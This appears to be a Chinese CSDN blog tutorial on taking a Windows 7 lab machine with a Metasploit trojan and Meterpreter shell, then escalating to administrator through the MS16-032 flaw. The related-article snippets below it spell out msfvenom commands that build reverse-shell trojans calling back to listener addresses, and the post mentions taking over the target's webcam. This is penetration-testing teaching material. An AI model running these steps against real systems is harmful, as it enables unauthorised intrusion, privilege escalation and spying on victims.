利用meterperter进行win7系统提权

最新推荐文章于 2024-09-30 16:55:37 发布
最新推荐文章于 2024-09-30 16:55:37 发布
阅读量1.8k 收藏 10
点赞数 1
分类专栏: 网络安全 kali渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63137680/article/details/127603598
版权

1.首先生成能够运行在win7系统上的木马程序,并把它上传到靶机win7上:

在这里插入图片描述

可见,生成的木马文件总共是7680个字节。

2.启动msfconsole,并查找相应的模块:

在这里插入图片描述

可以看到存在对应的payload供我们使用,接下来就是用exploit模块,监听在win7里的木马文件。

3.进入侦听模块,并查看需要的配置的参数:

4.设置必须的参数并设置payload

在这里插入图片描述

5.开启监听,并点击在win7上的木马程序:

在这里插入图片描述

可以看到,我们已经拿到了win7的meterpreter shell,接下来就是后渗透阶段了。

6.输入shell进入目标机的命令行,并查看当前权限:

在这里插入图片描述

由最后一行可以看到,我们当前权限是Medium Mandatory level,表明我们现在只是一个标准用户,我们的目标是拿到管理员权限High Mandatory level。

7.我们通过systeminfo命令查看系统补丁:

在这里插入图片描述

虽然有很多乱码,但是我们还是能够明显的看出系统已打的补丁编号,我们看到没有编号为KB3139914的补丁,也就是说系统还存在MS16-032漏洞。接下来我们就利用该漏洞就行提权。

7.利用命令exit返回meterpreter,并将meterpreter会话转为后台执行:

在这里插入图片描述

8.搜索ms16-032并进入该模块:

在这里插入图片描述

9.设置好session并利用该模块:

在这里插入图片描述

由返回信息可知,已经建立了新的session。

10.查看现在的权限:

在这里插入图片描述

现在已经是管理员权限了。

11.接下来就可以查看系统文件了:

查看当前处在目的机的那个位置,并且查看当前目录下有哪些文件,并上传了本地的一个letter文件:

在这里插入图片描述

在这里插入图片描述

当然我们还可以获取靶机摄像头的权限,控制对方摄像头,这里就不演示了。

雨蛏
关注
专栏目录
meterpreter提权小结
MercyLin的博客
09-05 3081
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行提权 首先我们可以输入getuid来查看当前用户的权限~ 可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其提升到system权限. getsystem自动提权 输入getsystem来尝试提权,MSF会自动选择合适的方式来提升当前权限 这个就比较玄学,我还没成功过,可以看到g...
kali对ubuntu16.04提权测试
blog-darcygail
08-17 545
ubuntu本地poc漏洞提权
使用Metasploit对Windows7进行提权
zhanqinli的博客
04-21 830
8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧。5、回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接上了,然后在终端中输入whoami /groups可以查看当前用户权限,可以看到我们只是普通用户。9、 复制该路径,使用use 进入,设置session,然后执行。
win7权限提升工具.reg
11-07
win7权限提升工具,实测好用,希望能够帮助大家!win7权限提升工具,实测好用,希望能够帮助大家!
Metasploit渗透测试之深度理解Meterpreter
最新发布
YJ_12340的博客
09-30 1609
在之前的教程中,我们更多地是学习了Metasploit的前渗透阶段,我们尝试了各种技术和利用来攻击我们的目标。在本文中,我们将重点介绍Metasploit中最先进的有效负载,以及我们在拿下目标机器shell后可以做什么。为我们提供了许多功能,可以简化我们探索目标机器的任务。我们已经在前面了解了如何使用,在本文节中,我们将详细了解,以及如何将其用作为后渗透阶段的强力工具。使用某些特定payloads有一个主要缺点,即会在受损系统中创建新进程,容易被杀毒软件发现。此外,payloads。
Meterpreter提权详解
devil8123665的博客
12-06 1711
转载https://www.cnblogs.com/backlion/p/9484950.html 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/me
Meterpreter 提权
eli的博客
05-20 2296
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
windows7提权
04-26
windows7 提权
msf下Windows提权
wjq18827615690的博客
03-18 284
利用msf生成payload获取目标机session 利用msf生成payload(可以获得一个低权限的session) 生成linux木马 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test msfvenom -a x86 --platform linux -p linux/x64/meterpreter/..
利用ms08_067对XP进行渗透
xiaopangding09的博客
06-01 622
简单记录以下之前写过的一次作业,权当复习一下。 1.什么是ms08_067? MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。 说明:微软安全公告KB958644 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 发布日期:2008/10/22 下载大小:因操作系统而异。 受影响的操作系统: Windows 2000;XP;Ser
使用kali实践一个简单的winxp漏洞MS08_067
幸福诗歌的博客
01-25 2903
8-067漏洞演示与CVE-2017-11882漏洞复现 MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_0...
windows系统提权工具.zip
12-25
windows7,windows2003等系统提权工具,psexec.exe程序可以实现windows7和2003的提权,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的进程。
对自己的window7提权
qq_53365842的博客
04-20 1590
(乱码就敲这个) 1.先生成一个后门 2.再用python3 -m http.server命令把后门下到window7里面去(要把防火墙关了) (1)进入window7打开网页输入http://192.168.91.128:8000找到自己的后门保存即可(要把防火墙关掉) 3.在建立监听模块把他打下来即可(和木马后门一样) (1) IP地址为自己kali的地址,端口号自选(和后门的端口号一样),设置好payload (2)在到window7上运行后门 (3)在run即可 4.在利用系统
Windows 7提权:技术解析与实战指南
weixin_43822401的博客
06-24 538
Windows 7提权通常是指从普通用户权限提升到系统管理员(SYSTEM)权限。这在获取到Webshell权限后尤其重要,因为普通用户权限能做的操作非常有限。
后渗透通过meterpreter模块提权
bring_coco的博客
11-06 992
继上一篇得到的普通session进行提权 提权方法: 一.提高程序的运行级别(uac) 说明:没有绕过uac,而且会弹出uac的框,如果用户点击执行才能成功获得更高权限的shell Msf模块: Exploit/windows/local/ask 1.试试看可不可以直接得到system权限 发现有报错 2.然后先把meterpreter这个session放到后台 3.加载此模块 Info可查看模块描述 用更高等级的水平去执行bypass低等级的uac设置 4.设置当前需要提权的session 此
win7提权代码
weixin_33915554的博客
12-26 394
inline BOOL SetPrivilege() { HANDLE hProcess, hToken; TOKEN_PRIVILEGES NewState; LUID luidPrivilegeLUID; hProcess = GetCurrentProcess(); if(!OpenProcessToken(hProcess, TO...
6-Meterprter
Cherryuuuu
02-05 949
Meterpreter 后渗透攻击
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5674
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨蛏

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值